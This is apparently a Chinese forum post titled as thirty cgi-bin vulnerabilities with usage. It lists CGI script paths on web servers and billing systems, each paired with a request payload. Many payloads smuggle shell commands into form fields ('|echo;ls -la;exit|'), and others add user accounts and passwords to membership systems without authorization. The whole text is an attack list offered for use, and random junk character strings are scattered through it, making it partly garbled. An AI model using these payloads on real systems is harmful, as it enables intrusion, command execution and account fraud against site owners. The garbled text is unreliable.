Cgi-bin 30个漏洞＋使用方法

admin

==============================
! j1 E3 h- g( O
9 F/ u4 t) g$ z9 C5 I' V/smspass.pl
username=username&password=password

/index.cgi
wei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password

5 ?9 h4 V& k# D) n) W/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
) e# C4 j! \' P* c% T4 U; M& g
% ~5 K/ e% L& A+ F, e: n/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
8 r, l9 W4 I2 H4 K0 o
3 T7 C; e, Q  O8 c# I/addusr.pl
5 Z8 U8 Q  w3 R$ O' {4 A/ p/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
: M2 H) f# A/ ]/ C1 x! O' o* D
0 k/ o) u, q+ a9 e# H: t$ K7 Z/ccbill-local.asp
post_values=username:password
8 j0 g# p' j4 n4 g( K7 x
/count.cgi
pinfile=|echo;ls -la;exit|

2 p) b$ T  I. n$ h3 Z/recon.cgi
: }! ^1 Z# _3 d  j( V/recon.cgi?search
( W* q! O( X6 e5 ~" P3 ksearchoption=1&searchfor=|echo;ls -al;exit|

$ }' z3 R+ U5 q. G* ]! g/verotelrum.pl
9 e3 C- A- j4 c. |% avercode=username:password:dseegsow:add:amount<&30>

: |5 D- y# R- l3 k6 v/af.cgi
_browser_out=|echo;ls -la;exit;|
5 v' ~& p* h: y7 s  K
" \3 L5 |+ l) c; t; y/modify.cgi
username=username&password=password&expire=30

* N+ Z0 h4 p1 M! c+ A0 {3 z/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
8 P7 q5 X7 @% o6 A( Y
/gx9passwd.cgi
, Y  L) M5 G) G) E" x( lcmd=ADD&user=username&pass=password
* z' c4 n- n" A, V) Z
( l' b6 M7 B/ f# y/probecontrol.cgi
command=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

' v; G' `$ S) v, Y7 p) Q$ `/htadd.pl
% _0 t' J9 H! O' A+ Kconfigfile=|echo; ls -alt; exit

/gx9passwd.cgi
cmd=ADD&user=username&pass=password

, {- k: B. b; `4 G. G/ibill*.pl
6 r% }9 z/ |+ i" O$ ^3 _! D( P* xreqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
; y: X6 g- H  r2 A, G/ J! w% ~. kcommand=add_member&username=username(EMAIL)&password=password(DES)
! |7 m4 [& ?; g: l; Y+ S
/ q4 n1 `% H1 P' a/globill_ut.cgi
1 m) K# q" o0 Ydo=add&username=username&password=password&wpassword=password

6 y5 N* N" H+ u9 C! p/usercontrol.cgi
, H8 [+ [7 t% I1 M2 l& R* G% O- Qcommand=enable&username=USER&password=PASS

/globoSALErum.cgi
! k% M# E" }" X3 I, Xaction=ADD&seccode=seccode&login=username&password=password
" W/ k1 L# \8 z# ^. }! F6 y
* n- K  H2 j" V$ A# K$ N8 e/addusr.pl
6 @+ u/ c0 I2 V( tuser=USER&pass=PASS&confirm=PASS
1 X1 a9 J) ?. ^- u
/pincount.cgi
, x% I9 r3 o* d* ?3 T* I/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

, ~( M* |( S5 t/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
# O0 E# v/ C- v4 C% ^  r2 a" B# A: lusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
5 h  X7 K# S% }, }/env.cgi
+ T/ y* |7 d- e6 P& qADD+;echo;pwd;exit
* l& p- Z- J5 [3 c* y/ ]2 e3 f
3 \; z: i- w% w' w4 V( l/count.cgi
+ y0 Q  B  J3 ?7 k8 Epinfile=|echo;pwd;exit|
! ~2 @1 Q% g! Y" |1 e- ?& x
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

; R5 R# B. V1 Y6 Y. W9 |/add.cgi
username=username&password=password&expire=30
' w; X6 F  B( t# n6 D; F) E
==============================